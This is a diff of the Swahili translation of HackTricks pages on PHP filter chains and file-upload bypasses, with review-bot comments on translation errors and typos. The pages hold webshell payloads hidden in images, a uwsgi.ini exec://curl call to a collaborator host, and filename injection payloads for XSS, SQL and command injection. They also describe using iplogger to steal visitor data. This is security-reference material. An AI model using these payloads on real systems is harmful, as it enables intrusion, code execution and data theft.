> **Includes** kawaida hufanya mambo kama **appending ".php" at the end** ya file, ambayo inaweza kufanya exploitation kuwa ngumu kwa sababu utahitaji kupata faili .php yenye content ambayo haitakufa (doesn't kill) exploit... au unaweza **tu tumia `php://temp` kama resource** kwa sababu inaweza **have anything appended in the name** (lie +".php") na bado itawezesha exploit kufanya kazi!
> **Includes** kawaida hufanya mambo kama **kuongeza ".php" mwishoni** mwa faili, jambo ambalo linaweza kufanya exploitation hii kuwa ngumu kwa sababu utahitaji kupata faili .php lenye yaliyomo ambayo haviua exploit... au unaweza **kutumia `php://temp` kama resource** kwa sababu inaweza **kupokea chochote kilichoongezwa kwenye jina** (kama +".php") na bado itawezesha exploit ifanye kazi!
## Jinsi ya kuongeza pia suffixes kwa data inayopatikana
## How to add also suffixes to the resulting data
[**This writeup explains**](https://www.ambionics.io/blog/wrapwrap-php-filters-suffix) jinsi unaweza bado kuabusu PHP filters kuongeza suffixes kwenye string inayopatikana. Hii ni nzuri ikiwa unahitaji output kuwa na format maalum (kama json au labda kuongeza baadhi ya PNG magic bytes)
[**This writeup explains**](https://www.ambionics.io/blog/wrapwrap-php-filters-suffix) how you can still abuse PHP filters to add suffixes to the resulting string. Hii ni nzuri ukiwa unahitaji output kuwa na muundo maalum (kama json au labda kuongeza baadhi ya PNG magic bytes)
## Vyombo vya Kiotomatiki
## Automatic Tools
- [https://github.com/synacktiv/php_filter_chain_generator](https://github.com/synacktiv/php_filter_chain_generator)
- [**https://github.com/ambionics/wrapwrap**](https://github.com/ambionics/wrapwrap) **(can add suffixes)**
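Review bot: steps 1–5 of the filter-chain loop ("prepend `\x1b$)C` to our string…" through "base64-decode to get our php code"), the headings "How to add also suffixes to the resulting data" and "Automatic Tools", and half of the wrapwrap paragraph were already in Swahili and are replaced with English here; that reverses the translation rather than improving it, so restore the Swahili lines. The rewritten warning block also keeps the upstream typo "(lie +".php")", which should read "(like +".php")".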
@ -96,7 +96,7 @@ print(r.text)
```
### Maboresho
Script iliyopita ina mipaka kwa herufi za base64 zinazohitajika kwa payload hiyo. Kwa hivyo, niliunda script yangu mwenyewe ili **bruteforce all the base64 characters**:
Script iliyotangulia imezuilishwa kwa herufi za base64 zinazohitajika kwa payload hiyo. Kwa hivyo, niliunda script yangu ili **bruteforce all the base64 characters**:
```php
conversions = {
'0': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.1046.UCS2',
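Review bot: the brute-force script opens with `conversions = {` and `'0': '…'`, which is Python dict syntax, yet the fence is tagged ```php; the hunk at line 251 of the same file ends with `?>`, so verify which language the block actually is and tag the fence to match (a Python dict inside a PHP tag will not run either way).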
@ -251,7 +251,7 @@ find_vals($init);
}
?>
```
## Marejeleo Zaidi
## Marejeo Zaidi
- [https://www.synacktiv.com/publications/php-filters-chain-what-is-it-and-how-to-use-it.html](https://www.synacktiv.com/publications/php-filters-chain-what-is-it-and-how-to-use-it.html)
- [The Art of PHP: CTF‑born exploits and techniques](https://blog.orange.tw/posts/2025-08-the-art-of-php-ch/)
@ -1,13 +1,13 @@
# Kupakia Faili
# File Upload
{{#include ../../banners/hacktricks-training.md}}
## Mbinu Za Jumla za Kupakia Faili
## File Upload General Methodology
Nyongeza za ziada muhimu:
Other useful extensions:
- **PHP**: _.php_, _.php2_, _.php3_, ._php4_, ._php5_, ._php6_, ._php7_, .phps, ._pht_, ._phtm, .phtml_, ._pgif_, _.shtml, .htaccess, .phar, .inc, .hphp, .ctp, .module_
- **Working in PHPv8**: _.php_, _.php4_, _.php5_, .phtml_, .module_, _.inc_, _.hphp_, _.ctp_
- **Working in PHPv8**: _.php_, _.php4_, _.php5_, .phtml_, .module_, .inc_, .hphp_, .ctp_
- **ASP**: _.asp, .aspx, .config, .ashx, .asmx, .aspq, .axd, .cshtm, .cshtml, .rem, .soap, .vbhtm, .vbhtml, .asa, .cer, .shtml_
- **Jsp:** _.jsp, .jspx, .jsw, .jsv, .jspf, .wss, .do, .action_
- **Coldfusion:** _.cfm, .cfml, .cfc, .dbm_
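Review bot: the title "# Kupakia Faili", the heading "## Mbinu Za Jumla za Kupakia Faili" and the line "Nyongeza za ziada muhimu:" are replaced with English ("# File Upload", "## File Upload General Methodology", "Other useful extensions:") in what is the Swahili README; that is a translation regression, so keep the Swahili lines. The rewritten PHPv8 line also drops the leading underscore on `.inc`, `.hphp` and `.ctp` (`_.inc_` becomes `.inc_`), which leaves unbalanced italics markers in the rendered list.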
@ -15,13 +15,13 @@ Nyongeza za ziada muhimu:
- **Perl**: _.pl, .cgi_
- **Erlang Yaws Web Server**: _.yaws_
### Kupitisha ukaguzi wa extensions za faili
### Bypass file extensions checks
1. Kama zinatumika, **angalia** **extensions zilizotajwa hapo juu.** Pia zijaribu kwa kutumia baadhi ya **herufi kubwa**: _pHp, .pHP5, .PhAr ..._
2. _Angalia **kuongeza extension halali kabla** ya extension ya utekelezaji (tumia extensions zilizotajwa hapo juu pia):_
1. If they apply, the **check** the **previous extensions.** Also test them using some **uppercase letters**: _pHp, .pHP5, .PhAr ..._
2. _Check **adding a valid extension before** the execution extension (use previous extensions also):_
- _file.png.php_
- _file.png.Php5_
3. Jaribu kuongeza **vishazi maalum mwishoni.** Unaweza kutumia Burp kufanya **bruteforce** kwa **ascii** na **Unicode** zote. (_Kumbuka pia unaweza kujaribu kutumia **extensions** zilizotajwa hapo juu_) 
3. Try adding **special characters at the end.** You could use Burp to **bruteforce** all the **ascii** and **Unicode** characters. (_Note that you can also try to use the **previously** motioned **extensions**_)
- _file.php%20_
- _file.php%0a_
- _file.php%00_
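Review bot: same regression as the previous hunk: the Swahili heading "### Kupitisha ukaguzi wa extensions za faili" and steps 1–3 are replaced with their English originals. If the English is kept, the new step 1 carries the upstream typo "If they apply, the **check** the **previous extensions.**" (duplicated "the") and step 3 says "motioned" where "mentioned" is meant; fix both.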
@ -31,7 +31,7 @@ Nyongeza za ziada muhimu:
- _file._
- _file.php...._
- _file.pHp5...._
4. Jaribu kuipita kinga kwa **kuudanganya parser ya extension** upande wa server kwa mbinu kama **kudouble** extension au **kuongeza data za taka** (bytes za **null**) kati ya extensions. _Unaweza pia kutumia **extensions** zilizotajwa hapo juu kupanga payload bora._
4. Try to bypass the protections **tricking the extension parser** of the server-side with techniques like **doubling** the **extension** or **adding junk** data (**null** bytes) between extensions. _You can also use the **previous extensions** to prepare a better payload._
- _file.png.php_
- _file.png.pHp5_
- _file.php#.png_
@ -40,13 +40,13 @@ Nyongeza za ziada muhimu:
- _file.php%0a.png_
- _file.php%0d%0a.png_
- _file.phpJunk123png_
5. Ongeza **tabaka nyingine za extensions** kwa ukaguzi uliotangulia:
5. Add **another layer of extensions** to the previous check:
- _file.png.jpg.php_
- _file.php%00.png%00.jpg_
6. Jaribu kuweka **exec extension kabla ya extension halali** na matumaini server imekonfiguriwa vibaya. (useful to exploit Apache misconfigurations where anything with extension** _**.php**_**, but** not necessarily ending in .php** will execute code):
6. Try to put the **exec extension before the valid extension** and pray so the server is misconfigured. (useful to exploit Apache misconfigurations where anything with extension** _**.php**_**, but** not necessarily ending in .php** will execute code):
- _ex: file.php.png_
7. Kutumia **NTFS alternate data stream (ADS)** katika **Windows**. Katika kesi hii, herufi ya colon ":" itaingizwa baada ya extension iliyoruhusiwa na kabla ya ile inayoruhusiwa. Matokeo yake, faili tupu yenye extension iliyoruhusiwa itaundwa kwenye server (mfano "file.asax:.jpg”). Faili hii inaweza kuhaririwa baadaye kwa kutumia mbinu nyingine kama kutumia short filename yake. Muundo wa "**::$data**” pia unaweza kutumika kuunda faili zisizo tupu. Kwa hiyo, kuongeza nukta baada ya muundo huu kunaweza kuwa muhimu kupita vizuizi zaidi (.e.g. "file.asp::$data.”)
8. Jaribu kuvunja mipaka ya jina la faili. Extension halali inakatwa. Na PHP ya hatari inabaki. AAA<--SNIP-->AAA.php
7. Using **NTFS alternate data stream (ADS)** in **Windows**. In this case, a colon character ":” will be inserted after a forbidden extension and before a permitted one. As a result, an **empty file with the forbidden extension** will be created on the server (e.g. "file.asax:.jpg”). This file might be edited later using other techniques such as using its short filename. The "**::$data**” pattern can also be used to create non-empty files. Therefore, adding a dot character after this pattern might also be useful to bypass further restrictions (.e.g. "file.asp::$data.”)
8. Try to break the filename limits. The valid extension gets cut off. And the malicious PHP gets left. AAA<--SNIP-->AAA.php
```
# Linux maximum 255 bytes
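Review bot: item 6 carries unbalanced bold markers on both sides (`where anything with extension** _**.php**_**, but** not necessarily ending in .php** will execute code`), so the parenthetical renders with stray asterisks, and the Swahili item 6 leaves that whole parenthetical untranslated. Item 7 keeps the `(.e.g. "file.asp::$data.”)` typo (`.e.g.` for `e.g.`) and mixes straight and curly quotes (`":”`) in both languages; worth fixing while these lines are being touched.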
@ -63,52 +63,52 @@ AAA<--SNIP 232 A-->AAA.php.png
- Bypass **Content-Type** checks by setting the **value** of the **Content-Type** **header** to: _image/png_ , _text/plain , application/octet-stream_
1. Content-Type **wordlist**: [https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/Web/content-type.txt](https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/Web/content-type.txt)
- Pitia ukaguzi wa **magic number** kwa kuongeza mwanzoni mwa faili bytes za picha halisi (kuwachanganya amri ya _file_). Au weka shell ndani ya **metadata**:\
- Bypass **magic number** check by adding at the beginning of the file the **bytes of a real image** (confuse the _file_ command). Or introduce the shell inside the **metadata**:\
`exiftool -Comment="<?php echo 'Command:'; if($_POST){system($_POST['cmd']);} __halt_compiler();" img.jpg`\
`\` au unaweza pia **kuingiza payload moja kwa moja** ndani ya picha:\
`\` or you could also **introduce the payload directly** in an image:\
`echo '<?php system($_REQUEST['cmd']); ?>' >> img.png`
- Ikiwa **compression** inaongezwa kwa picha yako, kwa mfano kwa kutumia maktaba za kawaida za PHP kama [PHP-GD](https://www.php.net/manual/fr/book.image.php), mbinu zilizotangulia hazitafaa. Hata hivyo, unaweza kutumia **PLTE chunk** [**technique defined here**](https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html) kuweka baadhi ya maandishi ambayo yataendelea kuwepo baada ya compression.
- If **compressions is being added to your image**, for example using some standard PHP libraries like [PHP-GD](https://www.php.net/manual/fr/book.image.php), the previous techniques won't be useful it. However, you could use the **PLTE chunk** [**technique defined here**](https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html) to insert some text that will **survive compression**.
- [**Github with the code**](https://github.com/synacktiv/astrolock/blob/main/payloads/generators/gen_plte_png.php)
- Ukurasa wa wavuti pia unaweza kuwa unafanya **resizing** kwa **picha**, kwa mfano kwa kutumia PHP-GD functions `imagecopyresized` au `imagecopyresampled`. Hata hivyo, unaweza kutumia **IDAT chunk** [**technique defined here**](https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html) kuingiza maandishi ambayo yataendelea kuwepo baada ya compression.
- The web page cold also be **resizing** the **image**, using for example the PHP-GD functions `imagecopyresized` or `imagecopyresampled`. However, you could use the **IDAT chunk** [**technique defined here**](https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html) to insert some text that will **survive compression**.
- [**Github with the code**](https://github.com/synacktiv/astrolock/blob/main/payloads/generators/gen_idat_png.php)
- Mbinu nyingine ya kutengeneza payload ambayo **itaishi wakati wa resizing ya picha**, kutumia PHP-GD function `thumbnailImage`. Hata hivyo, unaweza kutumia **tEXt chunk** [**technique defined here**](https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html) kuingiza maandishi ambayo yataendelea kuwepo baada ya compression.
- Another technique to make a payload that **survives an image resizing**, using the PHP-GD function `thumbnailImage`. However, you could use the **tEXt chunk** [**technique defined here**](https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html) to insert some text that will **survive compression**.
- [**Github with the code**](https://github.com/synacktiv/astrolock/blob/main/payloads/generators/gen_tEXt_png.php)
### Mbinu Nyingine za Kuangalia
### Other Tricks to check
- Tafuta udhaifu wa **rename** ya faili iliyopakiwa tayari (kubadilisha extension).
- Tafuta udhaifu wa **Local File Inclusion** ili kuendesha backdoor.
- **Uwezekano wa kufichuliwa kwa taarifa**:
1. Pakia **mara kadhaa** (na kwa **wakati mmoja**) **faili ile ile** yenye **jina lile lile**
2. Pakia faili yenye **jina** la **faili** au **folda** ambayo **tayari ipo**
3. Kupakia faili yenye **"." , "..", au "…" kama jina lake**. Kwa mfano, kwenye Apache katika **Windows**, kama application inahifadhi faili zilizopakuliwa katika saraka "/www/uploads/", filename "." itaunda faili iitwayo "uploads" katika saraka "/www/".
4. Pakia faili ambayo haiwezi kufutwa kwa urahisi kama **"…:.jpg”** katika **NTFS**. (Windows)
5. Pakia faili katika **Windows** na **herufi zisizo halali** kama `|<>*?”` katika jina lake. (Windows)
6. Pakia faili katika **Windows** ukitumia majina yaliyohifadhiwa (**reserved**) kama CON, PRN, AUX, NUL, COM1, COM2, COM3, COM4, COM5, COM6, COM7, COM8, COM9, LPT1, LPT2, LPT3, LPT4, LPT5, LPT6, LPT7, LPT8, and LPT9.
- Jaribu pia kupakia executable (.exe) au **.html** (inayofanana kidogo) ambayo **itaendesha code** wakati itafunguliwa bila kukusudia na mwathirika.
- Find a vulnerability to **rename** the file already uploaded (to change the extension).
- Find a **Local File Inclusion** vulnerability to execute the backdoor.
- **Possible Information disclosure**:
1. Upload **several times** (and at the **same time**) the **same file** with the **same name**
2. Upload a file with the **name** of a **file** or **folder** that **already exists**
3. Uploading a file with **".”, "..”, or "…” as its name**. For instance, in Apache in **Windows**, if the application saves the uploaded files in "/www/uploads/” directory, the ".” filename will create a file called "uploads” in the "/www/” directory.
4. Upload a file that may not be deleted easily such as **"…:.jpg”** in **NTFS**. (Windows)
5. Upload a file in **Windows** with **invalid characters** such as `|<>*?”` in its name. (Windows)
6. Upload a file in **Windows** using **reserved** (**forbidden**) **names** such as CON, PRN, AUX, NUL, COM1, COM2, COM3, COM4, COM5, COM6, COM7, COM8, COM9, LPT1, LPT2, LPT3, LPT4, LPT5, LPT6, LPT7, LPT8, and LPT9.
- Try also to **upload an executable** (.exe) or an **.html** (less suspicious) that **will execute code** when accidentally opened by victim.
### Mbinu maalum za extension
### Special extension tricks
Ikiwa unajaribu kupakia faili kwenye **PHP server**, [tazama mbinu ya **.htaccess** ya kutekeleza code](https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-web/php-tricks-esp/index.html#code-execution).\
Ikiwa unajaribu kupakia faili kwenye **ASP server**, [tazama mbinu ya **.config** ya kutekeleza code](../../network-services-pentesting/pentesting-web/iis-internet-information-services.md#execute-config-files).
If you are trying to upload files to a **PHP server**, [take a look at the **.htaccess** trick to execute code](https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-web/php-tricks-esp/index.html#code-execution).\
If you are trying to upload files to an **ASP server**, [take a look at the **.config** trick to execute code](../../network-services-pentesting/pentesting-web/iis-internet-information-services.md#execute-config-files).
Faili za `.phar` ni kama `.jar` kwa java, lakini kwa php, na zinaweza kutumika kama faili ya php (kuitekeleza na php, au kuiingiza ndani ya script...)
The `.phar` files are like the `.jar` for java, but for php, and can be **used like a php file** (executing it with php, or including it inside a script...)
Extension `.inc` wakati mwingine inatumika kwa faili za php zinazotumika tu kuingiza faili, hivyo, katika sehemu fulani, mtu anaweza kuruhusu **extension hii itekelezwe**.
The `.inc` extension is sometimes used for php files that are only used to **import files**, so, at some point, someone could have allow **this extension to be executed**.
## **Jetty RCE**
Ikiwa unaweza kupakia faili ya XML kwenye server ya Jetty unaweza kupata [RCE because **new \*.xml and \*.war are automatically processed**](https://twitter.com/ptswarm/status/1555184661751648256/photo/1)**.** Kwa hiyo, kama ilivyotajwa kwenye picha ifuatayo, pakia faili ya XML kwenye `$JETTY_BASE/webapps/` na tarajia shell!
If you can upload a XML file into a Jetty server you can obtain [RCE because **new \*.xml and \*.war are automatically processed**](https://twitter.com/ptswarm/status/1555184661751648256/photo/1)**.** So, as mentioned in the following image, upload the XML file to `$JETTY_BASE/webapps/` and expect the shell!
.png>)
## **uWSGI RCE**
Kwa uchambuzi wa kina wa udhaifu huu angalia utafiti wa awali: [uWSGI RCE Exploitation](https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html).
For a detailed exploration of this vulnerability check the original research: [uWSGI RCE Exploitation](https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html).
Remote Command Execution (RCE) vulnerabilities zinaweza kutumika kwenye server za uWSGI kama mtu ana uwezo wa kubadilisha faili ya usanidi `.ini`. Faili za usanidi za uWSGI zinatumia syntax maalumu kuingiza "magic" variables, placeholders, na operators. Huduma ya '@' operator, inayotumika kama `@(filename)`, imetengenezwa kuingiza yaliyomo ya faili. Miongoni mwa schemes mbalimbali zinazotumika katika uWSGI, scheme ya "exec" ni yenye nguvu sana, ikiruhusu kusoma data kutoka kwa standard output ya process. Kipengele hiki kinaweza kutumika kwa madhumuni mabaya kama Remote Command Execution au Arbitrary File Write/Read wakati faili ya usanidi `.ini` inapotubaliwa.
Remote Command Execution (RCE) vulnerabilities can be exploited in uWSGI servers if one has the capability to modify the `.ini` configuration file. uWSGI configuration files leverage a specific syntax to incorporate "magic" variables, placeholders, and operators. Notably, the '@' operator, utilized as `@(filename)`, is designed to include the contents of a file. Among the various supported schemes in uWSGI, the "exec" scheme is particularly potent, allowing the reading of data from a process's standard output. This feature can be manipulated for nefarious purposes such as Remote Command Execution or Arbitrary File Write/Read when a `.ini` configuration file is processed.
Tazama mfano ufuatao wa faili hatari ya `uwsgi.ini`, ikionyesha schemes mbalimbali:
Consider the following example of a harmful `uwsgi.ini` file, showcasing various schemes:
```ini
[uwsgi]
; read from a symbol
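Review bot: the Jetty paragraph is followed by a dangling image fragment `.png>)` (the image markup lost its `![](<...` opening), which renders as literal text, and the link in that paragraph ends in a stray `**.**`. Smaller points in the same hunk: `The web page cold also be **resizing**` should be `could`; the `thumbnailImage` bullet opens its second sentence with `However` although nothing contrasts with the first (copied from the two bullets above it); `If **compressions is being added to your image** ... won't be useful it` needs `compression is` and `won't be useful`; and the Swahili uWSGI paragraph has `inapotubaliwa` where `inapochambuliwa` (is parsed) is meant.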
@ -126,14 +126,14 @@ extra = @(exec://curl http://collaborator-unique-host.oastify.com)
; call a function returning a char *
characters = @(call://uwsgi_func)
```
Utekelezaji wa payload hufanyika wakati faili ya usanidi inapoangaliwa (kuchambuliwa). Ili usanidi uanze kutumika na kuchambuliwa, mchakato wa uWSGI lazima uanzishwe upya (huenda baada ya crash au kutokana na Denial of Service attack) au faili lazima iwe imewekwa ku-auto-reload. Kipengele cha auto-reload, ikiwa kimewezeshwa, hurudisha faili kwa vipindi vilivyobainishwa pindi kinapogundua mabadiliko.
The execution of the payload occurs during the parsing of the configuration file. For the configuration to be activated and parsed, the uWSGI process must either be restarted (potentially after a crash or due to a Denial of Service attack) or the file must be set to auto-reload. The auto-reload feature, if enabled, reloads the file at specified intervals upon detecting changes.
Ni muhimu kuelewa jinsi uchambuzi wa faili ya usanidi wa uWSGI unavyokuwa mpole. Hasa, payload iliyojadiliwa inaweza kuingizwa ndani ya faili ya binary (kama picha au PDF), na hivyo kupanua zaidi wigo wa matumizi mabaya yanayoweza kutokea.
Ni muhimu kuelewa upole wa parsing wa faili za configuration za uWSGI. Hasa, payload inayojadiliwa inaweza kuingizwa ndani ya faili ya binary (kama image au PDF), na hivyo kupanua wigo wa udhaifu unaowezekana.
## **wget File Upload/SSRF Trick**
Katika baadhi ya matukio unaweza kugundua kuwa server inatumia **`wget`** kupakua **faili** na unaweza **onyesha** **URL**. Katika kesi hizi, code inaweza kuwa inakagua kwamba extension ya faili zilizopakuliwa iko ndani ya whitelist ili kuhakikisha kwamba ni faili tu zilizoidhinishwa zitakapopakuliwa. Hata hivyo, **this check can be bypassed.**\
Urefu wa **maximum** wa **filename** katika **linux** ni **255**, hata hivyo, **wget** hukata majina ya faili hadi **236** characters. Unaweza **pakua faili inayoitwa "A"\*232+".php"+".gif"**, jina hili la faili lita **bypass** the **check** (kama katika mfano huu **".gif"** ni extension **valid**) lakini `wget` itawabadilisha jina la faili kuwa **"A"\*232+".php"**.
In some occasions you may find that a server is using **`wget`** to **kupakua mafaili** and you can **kuonyesha** the **URL**. In these cases, the code may be checking that the extension of the downloaded files is inside a whitelist to assure that only allowed files are going to be downloaded. However, **hii ukaguzi inaweza kupitishwa.**\
The **maximum** length of a **filename** in **linux** is **255**, however, **wget** truncate the filenames to **236** characters. You can **download a file called "A"\*232+".php"+".gif"**, this filename will **bypass** the **check** (as in this example **".gif"** is a **valid** extension) but `wget` will **rename** the file to **"A"\*232+".php"**.
```bash
#Create file and HTTP server
echo "SOMETHING" > $(python -c 'print("A"*(236-4)+".php"+".gif")')
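Review bot: the second wget paragraph switches language mid-sentence (`using **`wget`** to **kupakua mafaili** and you can **kuonyesha** the **URL** ... **hii ukaguzi inaweza kupitishwa.**`) while the paragraph before it is fully Swahili; keep each sentence in one language. In the Swahili filename-length line, `itawabadilisha jina la faili` uses a plural object marker for a single filename (`itabadilisha`), and the English `**wget** truncate the filenames` should be `truncates`. The command is unchanged context and its arithmetic matches the prose: `"A"*(236-4)+".php"+".gif"` is 240 characters, and cutting to 236 leaves the `.php` name.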
@ -156,35 +156,35 @@ AAAAAAAAAAAAAAAAAAAAAAAAAAAAA 100%[=============================================
2020-06-13 03:14:06 (1.96 MB/s) - ‘AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php’ saved [10/10]
```
Kumbuka kwamba **chaguo jingine** unaloweza kufikiria ili kupita ukaguzi huu ni kufanya **HTTP server i-rekibishe (redirect) hadi faili tofauti**, ili URL ya awali itapita ukaguzi lakini wget itapakua faili iliyorekebishwa kwa jina jipya. Hii **haitafanya kazi** **isipokuwa** wget inatumika na **parameter** `--trust-server-names` kwa sababu **wget itapakua ukurasa uliorekebishwa kwa jina la faili lililoainishwa kwenye URL ya asili**.
Note that **another option** you may be thinking of to bypass this check is to make the **HTTP server redirect to a different file**, so the initial URL will bypass the check by then wget will download the redirected file with the new name. This **won't work** **unless** wget is being used with the **parameter** `--trust-server-names` because **wget will download the redirected page with the name of the file indicated in the original URL**.
## Zana
## Vifaa
- [Upload Bypass](https://github.com/sAjibuu/Upload_Bypass) ni zana yenye nguvu iliyoundwa kusaidia Pentesters na Bug Hunters katika kujaribu file upload mechanisms. Inatumia mbinu mbalimbali za bug bounty kurahisisha mchakato wa kutambua na exploiting vulnerabilities, ikihakikisha tathmini kamilifu za web applications.
- [Upload Bypass](https://github.com/sAjibuu/Upload_Bypass) is a powerful tool designed to assist Pentesters and Bug Hunters in testing file upload mechanisms. It leverages various bug bounty techniques to simplify the process of identifying and exploiting vulnerabilities, ensuring thorough assessments of web applications.
### Corrupting upload indices with snprintf quirks (historical)
Baadhi ya legacy upload handlers zinazotumia `snprintf()` au zenye mitindo sawa kujenga multi-file arrays kutoka upload ya single-file zinaweza kudanganywa ili kutengeneza muundo wa `_FILES`. Kutokana na kutokuwepo kwa konsistensi na kukatwa (truncation) katika tabia ya `snprintf()`, upload moja iliyotengenezwa kwa uangalifu inaweza kuonekana kama faili nyingi zenye index upande wa server, ikachanganya mantiki inayodhani muundo thabiti (mfano, kuitendea kama multi-file upload na kuingia kwenye branches zisizo salama). Ingawa ni niche leo, mtindo huu wa “index corruption” mara kwa mara unaibukia tena katika CTFs na codebases za zamani.
Some legacy upload handlers that use `snprintf()` or similar to build multi-file arrays from a single-file upload can be tricked into forging the `_FILES` structure. Due to inconsistencies and truncation in `snprintf()` behavior, a carefully crafted single upload can appear as multiple indexed files on the server side, confusing logic that assumes a strict shape (e.g., treating it as a multi-file upload and taking unsafe branches). While niche today, this “index corruption” pattern occasionally resurfaces in CTFs and older codebases.
## Kutoka File upload hadi vulnerabilities nyingine
## From File upload to other vulnerabilities
- Weka **filename** kuwa `../../../tmp/lol.png` na ujaribu kufanikisha **path traversal**
- Weka **filename** kuwa `sleep(10)-- -.jpg` na huenda ukaweza kufanikisha **SQL injection**
- Weka **filename** kuwa `<svg onload=alert(document.domain)>` ili kufanikisha XSS
- Weka **filename** kuwa `; sleep 10;` kujaribu baadhi ya command injection (more [command injections tricks here](../command-injection.md))
- Set **filename** to `../../../tmp/lol.png` and try to achieve a **path traversal**
- Set **filename** to `sleep(10)-- -.jpg` and you may be able to achieve a **SQL injection**
- Set **filename** to `<svg onload=alert(document.domain)>` to achieve a XSS
- Set **filename** to `; sleep 10;` to test some command injection (more [command injections tricks here](../command-injection.md))
- [**XSS** in image (svg) file upload](../xss-cross-site-scripting/index.html#xss-uploading-files-svg)
- **JS** file **upload** + **XSS** = [**Service Workers** exploitation](../xss-cross-site-scripting/index.html#xss-abusing-service-workers)
- [**XXE in svg upload**](../xxe-xee-xml-external-entity.md#svg-file-upload)
- [**Open Redirect** via uploading svg file](../open-redirect.md#open-redirect-uploading-svg-files)
- Try **different svg payloads** from [**https://github.com/allanlw/svg-cheatsheet**](https://github.com/allanlw/svg-cheatsheet)
- [Famous **ImageTrick** vulnerability](https://mukarramkhalid.com/imagemagick-imagetragick-exploit/)
- Ikiwa unaweza **kuonyesha web server kuchukua picha kutoka kwa URL** unaweza kujaribu kuabusu [SSRF](../ssrf-server-side-request-forgery/index.html). Ikiwa **image** hii itahifadhiwa kwenye tovuti ya **public**, unaweza pia kutaja URL kutoka [https://iplogger.org/invisible/] na **kuiba taarifa za kila mtembeleaji**.
- If you can **indicate the web server to catch an image from a URL** you could try to abuse a [SSRF](../ssrf-server-side-request-forgery/index.html). If this **image** is going to be **saved** in some **public** site, you could also indicate a URL from [https://iplogger.org/invisible/](https://iplogger.org/invisible/) and **steal information of every visitor**.
- [**XXE and CORS** bypass with PDF-Adobe upload](pdf-upload-xxe-and-cors-bypass.md)
- Specially crafted PDFs to XSS: The [following page present how to **inject PDF data to obtain JS execution**](../xss-cross-site-scripting/pdf-injection.md). If you can upload PDFs you could prepare some PDF that will execute arbitrary JS following the given indications.
- Pakia \[eicar]\([**https://secure.eicar.org/eicar.com.txt**](https://secure.eicar.org/eicar.com.txt)) ili kuangalia kama server ina **antivirus**
- Angalia kama kuna **size limit** wakati wa kupakia faili
- Upload the \[eicar]\([**https://secure.eicar.org/eicar.com.txt**](https://secure.eicar.org/eicar.com.txt)) content to check if the server has any **antivirus**
- Check if there is any **size limit** uploading files
Hapa kuna orodha ya top 10 ya mambo unayoweza kufanikisha kwa kupakia (from [here](https://twitter.com/SalahHasoneh1/status/1281274120395685889)):
Here’s a top 10 list of things that you can achieve by uploading (from [here](https://twitter.com/SalahHasoneh1/status/1281274120395685889)):
1. **ASP / ASPX / PHP5 / PHP / PHP3**: Webshell / RCE
2. **SVG**: Stored XSS / SSRF / XXE
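Review bot: the `Tools` heading is translated two different ways in this hunk (`## Zana` and `## Vifaa`); `Zana` is the word for tools (`Vifaa` is equipment/devices), so both sides should agree. The eicar bullet has escaped link syntax in both languages (`\[eicar]\(...)`), so the brackets and backslashes render literally, and the Swahili SSRF bullet cites `[https://iplogger.org/invisible/]` without a link target while the English one links it. In the redirect paragraph, `so the initial URL will bypass the check by then wget will download` should read `but then wget will download`.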
@ -209,34 +209,34 @@ https://github.com/portswigger/upload-scanner
- **PNG**: `"\x89PNG\r\n\x1a\n\0\0\0\rIHDR\0\0\x03H\0\xs0\x03["`
- **JPG**: `"\xff\xd8\xff"`
Rejelea [https://en.wikipedia.org/wiki/List_of_file_signatures] kwa aina nyingine za faili.
Refer to [https://en.wikipedia.org/wiki/List_of_file_signatures](https://en.wikipedia.org/wiki/List_of_file_signatures) for other filetypes.
## Zip/Tar File Automatically decompressed Upload
Ikiwa unaweza kupakia ZIP ambayo itatolewa (decompressed) ndani ya server, unaweza kufanya vitu 2:
If you can upload a ZIP that is going to be decompressed inside the server, you can do 2 things:
### Symlink
Pakia archive yenye soft links kuelekea faili nyingine; kisha, ukifungua faili zilizotolewa utapata kufikia faili zilizounganishwa:
Upload a link containing soft links to other files, then, accessing the decompressed files you will access the linked files:
```
ln -s ../../../index.php symindex.txt
zip --symlinks test.zip symindex.txt
tar -cvf test.tar symindex.txt
```
### Fungua (decompression) katika folda tofauti
### Decompress in different folders
Uundaji usiotarajiwa wa faili katika folda wakati wa kufungua (decompression) ni tatizo kubwa. Licha ya dhana za awali kwamba usanidi huu ungeweza kuzuia utekelezaji wa amri za ngazi ya OS kupitia upakiaji wa faili zenye madhumuni mabaya, msaada wa compression wa muundo wa kihieraki na uwezo wa directory traversal wa muundo wa ZIP yanaweza kutumika vibaya. Hii inawawezesha wadukuzi kupita vikwazo na kutoroka kutoka kwenye folda za upload zilizo salama kwa kuathiri utendaji wa kufungua (decompression) wa programu inayolengwa.
